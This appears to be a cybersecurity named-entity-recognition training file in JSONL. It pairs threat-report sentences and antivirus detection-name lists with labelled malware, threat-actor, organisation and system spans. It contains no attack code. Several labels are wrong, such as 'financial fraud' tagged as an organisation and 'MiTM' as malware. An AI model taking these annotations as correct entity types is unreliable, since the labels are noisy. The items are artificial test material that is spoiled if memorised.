{"text": "A backdoor also known as: Worm.Downloader Worm.Downloader.Win32.3750 Win32.Trojan.WisdomEyes.16070401.9500.9984 Trojan.Dropper Win.Exploit.Fnstenv_mov-1 Worm.Win32.Downloader.am Trojan.Win32.Rubbish.evjgzp Trojan.Win32.Z.Downloader.135168.A Troj.GameThief.W32.OnLineGames.kZce Worm.Win32.Jalous.K Win32.HLLW.Rubbish BehavesLike.Win32.Downloader.ct Trojan.Win32.KillAV Worm/Downloader.ays EXP/Flash.EB.625 Worm/Win32.Downloader Win32.Troj.DwonLoaderT.xy.133203 Trojan:Win32/Elfapault.A Worm.Win32.Downloader.am Worm/Win32.Downloader.R2522 Win32/Jalous.K Win32.Worm.Downloader.Szlf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005382", "source": "cyner2_train"}}
{"text": "This can be anywhere from using the same strings, to weak obfuscation routines, or re-using the same snippet of code.", "spans": {}, "info": {"id": "cyner2_train_005383", "source": "cyner2_train"}}
{"text": "In July 2017 we discovered a malicious email sample delivering a new variant of Ursnif, attached within an encrypted Word document with the plaintext password within the email body.", "spans": {"MALWARE: variant": [[69, 76]], "MALWARE: Ursnif,": [[80, 87]]}, "info": {"id": "cyner2_train_005385", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Maener.A5 Trojan/CoinMiner.uy Trojan.Zusy.D19BD4 Win32/Tnega.AHKfcVD Win.Trojan.Maener-1 Trojan.Win32.BitCoinMiner.dfdxgr TrojWare.Win32.Graftor.PQIF Trojan.DownLoader11.43085 BehavesLike.Win32.AdwareLinkury.dm Trojan.Win32.CoinMiner Trojan:Win32/Maener.C!bit Trojan.BitCoinMiner Trojan.CoinMiner!oi2LJpWWJQU W32/CoinMiner.TY!tr Win32/Trojan.9e3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005388", "source": "cyner2_train"}}
{"text": "Recently, the Winnti group, a threat actor with a past of traditional cybercrime -particularly with financial fraud, has been seen abusing GitHub by turning it into a conduit for the command and control C and C communications of their seemingly new backdoor detected by Trend Micro as BKDR64_WINNTI.ONM.", "spans": {"THREAT_ACTOR: the Winnti group, a threat actor": [[10, 42]], "THREAT_ACTOR: traditional cybercrime": [[58, 80]], "ORGANIZATION: financial fraud,": [[100, 116]], "SYSTEM: GitHub": [[139, 145]], "MALWARE: backdoor": [[249, 257]], "ORGANIZATION: Trend Micro": [[270, 281]]}, "info": {"id": "cyner2_train_005391", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Vinself.B Trojan.Vinself Trojan.PWS.DPD.8 BehavesLike.Win32.VTFlooder.ch Trojan.Symmi.DA32B Backdoor:Win32/Wakbot.B Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005392", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Banker.evqhye BehavesLike.Win32.Dropper.ph W32/Trojan.SNBX-9361 TR/Spy.Banker.fyxgc Trojan.Symmi.DC916 Trj/GdSda.A Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005394", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Win32.Trojan.WisdomEyes.16070401.9500.9888 Trojan.Giku.Win32.37 BehavesLike.Win32.Ransomware.fc TrojanDownloader:Win32/Gladgerown.B Trojan-Proxy.AOSK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005395", "source": "cyner2_train"}}
{"text": "While Panda Banker has become more prevalent in recent weeks, we have been tracking a large campaign this week targeting banks in Europe and Australia and, interestingly, UK online casinos and international online payment systems.", "spans": {"MALWARE: Panda Banker": [[6, 18]], "THREAT_ACTOR: large campaign": [[86, 100]], "ORGANIZATION: targeting banks": [[111, 126]], "ORGANIZATION: casinos": [[181, 188]], "SYSTEM: international online payment systems.": [[193, 230]]}, "info": {"id": "cyner2_train_005396", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Zusy.D22B33 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Hijacker.evkwtm Trojan.DownLoader25.54001 Trojan.Win32.Pastraw Trojan:Win32/Nibagem.A Trojan/Win32.Asprox.C718808 SScope.Backdoor.Sdbot W32/Pastraw.A!tr Win32/Trojan.d54", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005398", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.YakesCS.S1573857 Trojan.Ransom.Sage Trojan.Filecoder.Win32.6418 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.HXTV-7683 Ransom.Cry!g2 Trojan.Win32.Filecoder.etsgeu TrojWare.Win32.Filecoder.GT Trojan.DownLoader25.46287 BehavesLike.Win32.Downloader.gc Trojan.Yakes.xat TR/Crypt.ZPACK.hzbag Trojan.Win32.Sage.442368 Trojan.Yakes Ransom.FileCryptor Win32/Filecoder.NHQ Trojan.Yakes!0Hl2Fx4Uudk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005400", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9912 Backdoor:Win32/Ptiger.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005401", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Vreikstadi Trojan.Win32.Inject.evlgqj Trojan.Win32.Injector W32/Trojan.HMUN-3172 TR/Injector.avgqa Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005402", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.LogoOneR.PE Worm.Win32.Viking!O W32/HLLP.Philis.ba Worm.Viking.Win32.8 Trojan/PSW.Delf.qo Win32.Worm.Viking.a W32/PWStealer.AOC W32.Looked.P PE_LOOKED.FX Win.Spyware.11941-2 Worm.Win32.Viking.mi Trojan.Win32.Viking.btggzy Worm.Win32.Viking.49152 Worm.Win32.Viking.ae Win32.Viking.AT~clean Win32.HLLW.Gavir.93 PE_LOOKED.FX BehavesLike.Win32.HLLPPhilis.dz Worm.Win32.Viking Worm/Viking.el Worm/Win32.Viking.mi Win32.Viking.av.49152 Virus:Win32/Viking.JB Backdoor.W32.Bifrose.lz9q Worm.Win32.Viking.mi MalwareScope.Worm.Viking.4 Win32/Viking.AT Worm.Viking.FP W32/Viking.WH.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005404", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.Sherlol.A Trojan-Downloader/W32.Sherlol.4608 Trojan/StartPage.cj Trojan.Downloader.Sherlol.A Trojan.DL.Sherlol!c8F6ghXOM0o Win32/TrojanDownloader.Sherlol Trojan-Downloader.Win32.Sherlol Trojan.Win32.Sherlol.dngr Trojan.Win32.Downloader.4608.EN[h] Trojan.Downloader.Sherlol.A TrojWare.Win32.TrojanDownloader.Sherlol Trojan.Downloader.Sherlol.A Trojan.DownLoader.4608 Downloader.Sherlol.Win32.3 BehavesLike.Win32.Downloader.xt TrojanDownloader.Satray.k TR/Dldr.Sherlol W32/Sherlol.CJ!tr Trojan[Downloader]/Win32.Sherlol Trojan.Downloader.Sherlol.A Troj.Downloader.W32.Sherlol!c Win-Trojan/Sherlol.4608 Win32/Startpage.CJ!downloader Trojan.Downloader.Sherlol.A Trj/Downloader.CET Trojan.Win32.StartPage Trojan.Downloader.Sherlol.A Downloader.Sherlol.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005406", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Sirefef.FR Trojan.Sirefef.FR Win32.Trojan.Sirefef.b Trojan.Sirefef.FR Trojan.Sirefef.FR BackDoor.Maxplus.5220 BehavesLike.Win64.Ramnit.pt Trojan.Win64 Trojan[Backdoor]/Win64.ZAccess Trojan.Sirefef.FR Trojan:Win64/Sirefef.F Trojan.Sirefef.FR Win64/Sirefef.W", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005408", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.BAT.Starter.bn Bat.Trojan.Starter.Aliq Backdoor:Win32/Teldoor.C Trojan.BAT.Starter.bn Trojan/Win32.Dropper.C406140 Trojan.Horst.0315 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005410", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Symmi.D2391 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Neshgaig-1 BehavesLike.Win32.Worm.gc W32/Trojan.MVJF-1155 Heur:Trojan/PSW.Dnf TrojanDownloader:Win32/Somex.B TrojanSpy.TravNet Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005412", "source": "cyner2_train"}}
{"text": "The operation remains active at the time of writing this post, with attacks reported as recently as February 2017.", "spans": {"THREAT_ACTOR: The operation": [[0, 13]]}, "info": {"id": "cyner2_train_005414", "source": "cyner2_train"}}
{"text": "The malware authors are currently targeting users of Mexico s second largest bank, Banamex, but it is capable of updating the configuration file to include more financial institutions.", "spans": {"THREAT_ACTOR: The malware authors": [[0, 19]], "ORGANIZATION: users": [[44, 49]], "ORGANIZATION: second largest bank, Banamex,": [[62, 91]], "ORGANIZATION: financial institutions.": [[161, 184]]}, "info": {"id": "cyner2_train_005415", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: Trojan.Linux.ChinaZ.D Trojan-DDoS.Linux.Znaich.A Trojan.Linux.ChinaZ.D ELF_ZANICH.SMB Trojan.Linux.ChinaZ.D HEUR:Trojan-DDoS.Linux.Znaich.a Trojan.Linux.ChinaZ.D Trojan.Znaich.exfzmb Troj.Ddos.Linux!c Trojan.Linux.ChinaZ.D Trojan.Linux.ChinaZ.D Linux.DDoS.73 Trojan.ChinaZ.Linux.14 ELF_ZANICH.SMB Linux/DDoS-Flood.B ELF/Trojan.ULZK-7 TrojanDDoS.Linux.ax LINUX/ChinaZ.eevfy Trojan[DDoS]/Linux.Znaich.a Trojan.Linux.ChinaZ.D Linux/Ddos.1806356 HEUR:Trojan-DDoS.Linux.Znaich.a Linux/DDoS-Flood.B Trojan.Linux.Znaich.aaac DDOS.Linux.CinaZ Win32/Trojan.9b6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005416", "source": "cyner2_train"}}
{"text": "Bartalex is a name that continues to appear in a cyberthief's arsenal as one of the most popular mechanisms for distributing banking Trojans, ransomware, RATs, and other malware.", "spans": {"THREAT_ACTOR: cyberthief's arsenal": [[49, 69]], "MALWARE: banking Trojans, ransomware,": [[125, 153]], "MALWARE: RATs,": [[154, 159]], "MALWARE: other malware.": [[164, 178]]}, "info": {"id": "cyner2_train_005418", "source": "cyner2_train"}}
{"text": "It is no surprise it's now being used against pro-democracy organizations and supporters in Hong Kong that have long been a target of advanced attack campaigns.", "spans": {"ORGANIZATION: pro-democracy organizations": [[46, 73]], "ORGANIZATION: supporters": [[78, 88]], "THREAT_ACTOR: advanced attack campaigns.": [[134, 160]]}, "info": {"id": "cyner2_train_005419", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameBTP.Worm Trojan-PWS/W32.WebGame.34816.CL Trojan-GameThief.Win32.OnLineGames!O Trojan.Downloader.E9C186 Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Pws.AHAF Trojan.Win32.OnLineGames.cwndth Trojan.Win32.Z.Onlinegames.34816.AS Trojan.PWS.Gamania.10257 Trojan.OnLineGames.Win32.121510 Trojan-GameThief.Win32.OnLineGames Trojan/PSW.OnLineGames.aibk Trojan[GameThief]/Win32.OnLineGames Win32.Troj.Downloader.gy.kcloud Trojan/Win32.OnlineGameHack.C55967 W32/OnlineGames.SOI!tr.pws Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005421", "source": "cyner2_train"}}
{"text": "Version 2, also referred to as Globe2, appeared two months later, in October, but both versions were no match for Emsisoft's team, who released free decrypters for both variants shortly after Globe and Globe2 started hitting users.", "spans": {"MALWARE: Version 2,": [[0, 10]], "MALWARE: Globe2,": [[31, 38]], "MALWARE: versions": [[87, 95]], "ORGANIZATION: Emsisoft's team,": [[114, 130]], "MALWARE: variants": [[169, 177]], "MALWARE: Globe": [[192, 197]], "MALWARE: Globe2": [[202, 208]], "ORGANIZATION: users.": [[225, 231]]}, "info": {"id": "cyner2_train_005422", "source": "cyner2_train"}}
{"text": "A backdoor also known as: JS:Trojan.JS.Redirector.BS JS.Redirector.DE JS:Trojan.JS.Redirector.BS JS/Redir.WI Trojan.Malscript!html JS:Trojan.JS.Redirector.BS JS:Trojan.JS.Redirector.BS Trojan.Script.Expack.drqfka JS:Trojan.JS.Redirector.BS JS:Trojan.JS.Redirector.BS BehavesLike.PDF.Trojan.db JS/Redir.WI TrojanDownloader.JS.aufd JS/Redirector.OA.1 JS:Trojan.JS.Redirector.BS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005423", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TSPY_WHITEICE_BK22015F.TOMC Win32.Worm.WhiteIce.a TSPY_WHITEICE_BK22015F.TOMC Trojan.Win32.WhiteIce.cyctb Win32.Virus.Whiteice.Tcvt Win32.HLLW.Bice.8 BehavesLike.Win32.Trojan.jh Virus.Win32.Whiteice WORM/Darksnow.37953.2 Worm/Win32.WhiteIce.R35142 Worm.WhiteIce Win32/Whiteice.B Worm.WhiteIce!tYiT3Eh27BE Trj/CI.A Virus.Win32.BlackIce.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005425", "source": "cyner2_train"}}
{"text": "A backdoor also known as: JS/ProxyJack.C1!Eldorado JS.Downloader JS/ProxyChanger.BF BehavesLike.JS.Exploit.mm JS/ProxyJack.C1!Eldorado TrojanProxy:JS/Kovonionz.A JS/Nemucod.io Trojan.JS.ProxyChanger JS/ProxyChanger.BF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005426", "source": "cyner2_train"}}
{"text": "The Trojan uses the Windows Management Instrumentation Command-line WMIC to start processes remotely on other Windows computers.", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: the Windows Management Instrumentation Command-line WMIC": [[16, 72]], "SYSTEM: Windows computers.": [[110, 128]]}, "info": {"id": "cyner2_train_005428", "source": "cyner2_train"}}
{"text": "New OSX_DOK.C variant performing MiTM.", "spans": {"MALWARE: MiTM.": [[33, 38]]}, "info": {"id": "cyner2_train_005429", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SwenA.Worm Worm/W32.Swen.151552 Email-Worm.Win32!O W32.Swen.A W32.W.Swen!c Win32.Trojan.WisdomEyes.16070401.9500.9969 W32/Swen.A@mm W32.Swen.A@mm Win32/Swen.A Win.Worm.Gibe-4 Trojan.Win32.Scar.fcci Trojan.Win32.Swen.gicl I-Worm.Win32.Swen.106496 Win32.Trojan.Scar.Wofg Worm.Win32.Swen.A Win32.HLLM.Gibe.2 Worm.Swen.Win32.3 Email-Worm.Win32.Swen W32/Swen.A@mm Trojan/Win32.Scar Trojan.Win32.Scar.fcci Worm:Win32/Swen.A@mm Email-Worm.Win32.Swen W32/Gibe.C.worm I-Worm.Swen.A Win32/Swen.A I-Worm.Swen.A1 W32/Swen.A@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005430", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.GekasiK.Trojan Worm.Foler.E5 WORM_SILLY.WXXZLDR Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Hangove WORM_SILLY.WXXZLDR Virus.Win32.Renamer.u ApplicUnwnt.Win32.ArchSMS.DRPA Worm.Renamer.Win32.2 BehavesLike.Win32.Virus.gm Trojan.Win32.Webprefix Virus/Win32.Renamer.u Trojan.Zusy.D15B99 Virus.Win32.Renamer.u Worm:Win32/Foler.C Worm.Win32.Foler.a W32/Foler.A!worm Win32/Worm.b18", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005432", "source": "cyner2_train"}}
{"text": "Looking closer at the structure of this attack, we were surprised when we realized this was the infamous Blackhole.", "spans": {"MALWARE: Blackhole.": [[105, 115]]}, "info": {"id": "cyner2_train_005434", "source": "cyner2_train"}}
{"text": "In May we also observed an Office 365 credential phishing attack leading to iSpy Keylogger but the combination of OWA with this infection chain takes a different approach.", "spans": {"MALWARE: iSpy Keylogger": [[76, 90]]}, "info": {"id": "cyner2_train_005436", "source": "cyner2_train"}}
{"text": "New activity from NewPOSThings and the You Chung actor.", "spans": {"MALWARE: NewPOSThings": [[18, 30]], "THREAT_ACTOR: the You Chung actor.": [[35, 55]]}, "info": {"id": "cyner2_train_005437", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnlineGameNAKSD.Trojan Trojan-Downloader.Win32.VB!O Trojan.VBCrypt.MF.90 Downloader.VB.Win32.66970 Trojan/Downloader.VB.zqs Trojan.Heur.ZGY.5 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan3.BYE Backdoor.Trojan Win32/Axespec.C TSPY_ZBOT.BVV Trojan-Downloader.Win32.VB.zqs Trojan.Win32.VB.bcwli Trojan.Win32.Downloader.71680.CE Trojan.Oficla.59 TSPY_ZBOT.BVV BehavesLike.Win32.PWSAxespec.wc Trojan-Ransom.Win32.PornoBlocker TrojanDownloader.VB.dfho PWS:Win32/Axespec.C Troj.Downloader.W32.VB.tnTN Trojan-Downloader.Win32.VB.zqs Trojan/Win32.FakeAV.R51073 PWS-Axespec.f SScope.Trojan.VB.0862 Trojan.Dropper.VB Trojan.Injector.SOC W32/Injector.VOX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005439", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.VB.bjci Trojan.Win32.VB.bkqmep VBTroj.MYNR Trojan.Win32.VB.bjci Trojan.DL.VB!OZxgAC/E/K8 Trojan.Win32.A.VB.1289216[ASPack] TrojWare.Win32.VB.baur Trojan.DownLoader5.27404 Trojan/Win32.VB W32/Trojan.SXSN-1674 Trojan.VB Trojan-Downloader.VB Downloader.VB.7.BG Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005440", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heur.Corrupt.PE BehavesLike.Win32.Rontokbro.nc TrojanDownloader.Femad.at HackTool[Constructor]/Win32.Bom Constructor:Win32/Bom.7_0.dam#2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005441", "source": "cyner2_train"}}
{"text": "Unit 42 has discovered a new malware family we've named Reaver with ties to attackers who use SunOrcal malware.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: a new malware family": [[23, 43]], "MALWARE: Reaver": [[56, 62]], "THREAT_ACTOR: attackers": [[76, 85]], "MALWARE: SunOrcal malware.": [[94, 111]]}, "info": {"id": "cyner2_train_005442", "source": "cyner2_train"}}
{"text": "This article will walk through an incident where Tomcat is used and what critical artifacts you should collect.", "spans": {}, "info": {"id": "cyner2_train_005446", "source": "cyner2_train"}}
{"text": "Check Point Research's new report on Chinese cyber-espionage attacks against Southeast Asian government entities shows that a previously undisclosed toolset used by an APT group has been linked to a new family of malware.", "spans": {"ORGANIZATION: Check Point Research's": [[0, 22]], "THREAT_ACTOR: Chinese cyber-espionage": [[37, 60]], "ORGANIZATION: government": [[93, 103]], "MALWARE: toolset": [[149, 156]], "THREAT_ACTOR: an APT group": [[165, 177]], "MALWARE: malware.": [[213, 221]]}, "info": {"id": "cyner2_train_005450", "source": "cyner2_train"}}
{"text": "A backdoor also known as: WORM_RBOT.AS Win32.Trojan.WisdomEyes.16070401.9500.9761 W32/Backdoor2.DNGR Win32/SillyAutorun.AIH WORM_RBOT.AS Packed.Win32.CPEX-based.ht Trojan.Win32.CPEXbased.bregf Trojan.MulDrop.23017 W32/Backdoor.MVUH-2689 Backdoor/VB.nkv Packed.Win32.CPEX-based.ht Trojan/Win32.Xema.R61630", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005451", "source": "cyner2_train"}}
{"text": "The actors involved seem to be the same as the ones behind the self sufficient Flash malverts/exploits we've documented before and also reported by security researcher Kafeine Spartan EK.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "VULNERABILITY: Flash malverts/exploits": [[79, 102]], "ORGANIZATION: security researcher Kafeine": [[148, 175]], "MALWARE: Spartan EK.": [[176, 187]]}, "info": {"id": "cyner2_train_005452", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.NSIS.Miner.SD Trojan.Strictor.D1B5F4 Multi.Threats.InArchive W32/Trojan.RYKP-1781 WORM_CO.331300D2 Win.Trojan.Virtob-1633 Trojan.Win32.CoinMiner.bn Trojan.Win32.BitCoinMiner.ddjqfi AdWare.W32.OneInstaller.lZ9E Win32.Trojan.Miner.Wwen Trojan.BtcMine.1033 WORM_CO.331300D2 BehavesLike.Win32.TrojanCoinMiner.vc Trojan.NSIS.Coinminer W32/Trojan2.OZCV Trojan/PSW.Tepfer.cbjx Trojan/Win32.Miner.ayf Trojan:Win32/CoinMiner.AQ Trojan.Win32.CoinMiner.bn Trojan/Win32.BitCoinMiner.C931392 RiskWare.BitCoinMiner NSIS/CoinMiner.N W32/Miner.AYF!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005453", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnlinegameXMQB.Trojan Trojan.FlyStudio.UJ W32/AutoRun.soq Win32.Trojan.FlyStudio.hd W32.SillyFDC Win32/Nuj.AD WORM_FLYSTUDI.B Win.Worm.FlyStudio-23 Trojan.Win32.Crypted.wjgrc Worm.Win32.Autorun.175133 W32.W.AutoRun.l8Zk Trojan.Click2.51706 Worm.AutoRun.Win32.2576 WORM_FLYSTUDI.B BehavesLike.Win32.Autorun.bc Trojan.Win32.FlyStudio Worm/AutoRun.fpz Worm/Win32.FlyStudio Worm:Win32/Regul.B Worm.FlyStudio Trj/FlyStudio.CR Trojan.FlyStudio.NAQ Win32/FlyStudio.NAQ Trojan.Win32.FakeFolder.t", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005455", "source": "cyner2_train"}}
{"text": "In this blog entry, we will introduce and analyze the other tools and malware used by Earth Preta.", "spans": {"MALWARE: tools": [[60, 65]], "MALWARE: malware": [[70, 77]], "THREAT_ACTOR: Earth Preta.": [[86, 98]]}, "info": {"id": "cyner2_train_005457", "source": "cyner2_train"}}
{"text": "This IP address has been observed attempting to bruteforce SSH server credentials, SSH, which stands for Secure Shell, is a [network protocol]https://null-byte.wonderhowto.com/how-to/networking-basics/ that allows for encrypted communication over an insecure network.", "spans": {"SYSTEM: SSH server": [[59, 69]], "SYSTEM: SSH,": [[83, 87]], "SYSTEM: Secure Shell,": [[105, 118]], "SYSTEM: insecure network.": [[250, 267]]}, "info": {"id": "cyner2_train_005458", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeDirC.Worm Win32.Tyhos.A Virus.Win32.Tyhos!O Trojan.Malex.F2 Virus.Tyhos.Win32.4 Win32.Tyhos.A W32.Virut.CF Win32/Tyhos.A Virus.Win32.Tyhos.a Win32.Tyhos.A Trojan.Win32.Tyhos.bdclx Packer.W32.Tibs.l4Hz Trojan.Win32.FakeFolder.mgge Win32.Tyhos.A Win32.Tyhos.A Trojan.Styho BehavesLike.Win32.VirRansom.ph Win32/Virut.bv Virus/Win32.Tyhos.a Worm:Win32/Nestog.A Virus.Win32.Tyhos.a Win32.Tyhos.A HEUR/Fakon.mwf Win32.Tyhos.A Win32.Virut.NAB Win32/Virut.NBP Virus.Win32.Tyhos Trj/Tyghos.A Win32/Virus.4bd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005461", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Tapslix RDN/Autorun.worm!e Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan.PONZ-7153 Trojan.DownLoader5.52616 RDN/Autorun.worm!e Trojan/Win32.Unknown Trojan.Strictor.D4F65 Trojan:Win32/Tapslix.A HEUR/Fakon.mwf Win32.Trojan.Fakedoc.Auto Trojan.CFI!dl5uaEh6TdQ W32/Yoddos.AG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005462", "source": "cyner2_train"}}
{"text": "Operation Black Atlas has already spread to a multi-state healthcare provider, dental clinics, a machine manufacturer, a technology company focusing on insurance services, a gas station that has a multi-state presence, and a beauty supply shop.", "spans": {"THREAT_ACTOR: Operation Black Atlas": [[0, 21]], "ORGANIZATION: multi-state healthcare provider, dental clinics,": [[46, 94]], "ORGANIZATION: machine manufacturer,": [[97, 118]], "ORGANIZATION: technology company focusing on insurance services,": [[121, 171]], "ORGANIZATION: gas station": [[174, 185]], "ORGANIZATION: multi-state presence,": [[197, 218]], "ORGANIZATION: beauty supply shop.": [[225, 244]]}, "info": {"id": "cyner2_train_005466", "source": "cyner2_train"}}
{"text": "Within the framework of the analyzes, however, the BSI has not discovered any malicious software; infections are also not known to the BSI.", "spans": {"ORGANIZATION: the BSI": [[47, 54]], "MALWARE: malicious software; infections": [[78, 108]], "ORGANIZATION: the BSI.": [[131, 139]]}, "info": {"id": "cyner2_train_005468", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.Death_Packed.439808 BackDoor-FP.cli Backdoor.Death!/0dScPy2Eok Win32/Death.23 W32/Death.C Backdoor.Trojan W32/Death.2_3 Trojan.Win32.Heur.089 Win32.Death.23 Backdoor.Win32.Death.23 Backdoor.Death.23 Backdoor.Win32.Death.23 Backdoor.Death.23 BackDoor.Death.23 TR/Dearh.23.Cli Backdoor.Win32.Death!IK Backdoor/Death.23 Backdoor/Win32.Death Backdoor.Win32.Death_23.Client Backdoor.Death.23 W32/Death.C Win-Trojan/Death.439808 Backdoor.Trojan Backdoor.Win32.Death W32/Backdoor.LamersDeath-FP BackDoor.Death Bck/Death.23.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005471", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Fareit W32/Injector.GFG Trojan.Win32.Stealer.ewulwv Trojan.Win32.Z.Injector.999936 Trojan.PWS.Stealer.20566 Trojan.Win32.Injector W32/Injector.NZPO-0886 DR/Delphi.pzjjj Trojan[Backdoor]/Win32.Androm Trojan/Win32.Inject.R217517 Backdoor.Androm Trj/CI.A Win32.Trojan.Delf.Swaz W32/Injector.DVFA!tr Win32/Trojan.986", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005473", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Temratanam Trojan.MaskedTeamViewer Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.SCHM-2542 TROJ_GE.52AE4DE2 Backdoor.Win32.TeamBot.cq Trojan.Win32.TeamBot.eutqba BackDoor.TeamViewer.45 TROJ_GE.52AE4DE2 BehavesLike.Win32.Backdoor.tc Backdoor:Win32/Temratanam.A Backdoor.Win32.TeamBot.cq PUP/Win32.StartSurf.R196040 Backdoor.TeamBot Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005474", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.RugoAd.Fam.Trojan TrojanDropper.Purgodoor.A5 TROJ_DROPR.SMD1 Adware.Rugo TROJ_DROPR.SMD1 AdWare.W32.BHO.lhD4 ApplicUnsaf.Win32.AdWare.BHO.AM Trojan.MulDrop1.42303 BehavesLike.Win32.Downloader.gc Adware/MsLock.akh GrayWare[AdWare]/Win32.BHO TrojanDropper:Win32/Purgodoor.A Dropper/Win32.Cadro.R1482 Adware-Rugo.f AdWare.BHO Trj/CI.A Win32.Trojan.Obfuscator.Ajla not-a-virus:AdWare.Win32.BHO Win32/Trojan.b5d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005475", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.InfecDoor.746584 Backdoor.InfecDoor!stFv1Z+nlTE Win32/Infector.20.A Backdoor.Surgeon BKDR_INFDOOR20.A Win32.InfecDoor.20.a Trojan.Infector-17 Backdoor.Win32.InfecDoor.20.a Backdoor.Win32.InfecDoor!IK Backdoor.Win32.Infector.20.A BackDoor.Infector.20 BDS/Infect.20.Srv2 BKDR_INFDOOR20.A Win32/Theinf.20.B Backdoor/Infector.20.a Backdoor:Win32/Infector.2_0 Backdoor.Win32.InfecDoor_20 Win-Trojan/Infecdoor.746584 Backdoor.Surgeon Backdoor.Win32.InfecDoor BackDoor.Infector Bck/Infector.20", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005477", "source": "cyner2_train"}}
{"text": "We believe the threat actors behind the attack don't use exploit kits and automated installers to instantly compromise and infect victims.", "spans": {"THREAT_ACTOR: threat actors": [[15, 28]], "MALWARE: exploit kits": [[57, 69]]}, "info": {"id": "cyner2_train_005478", "source": "cyner2_train"}}
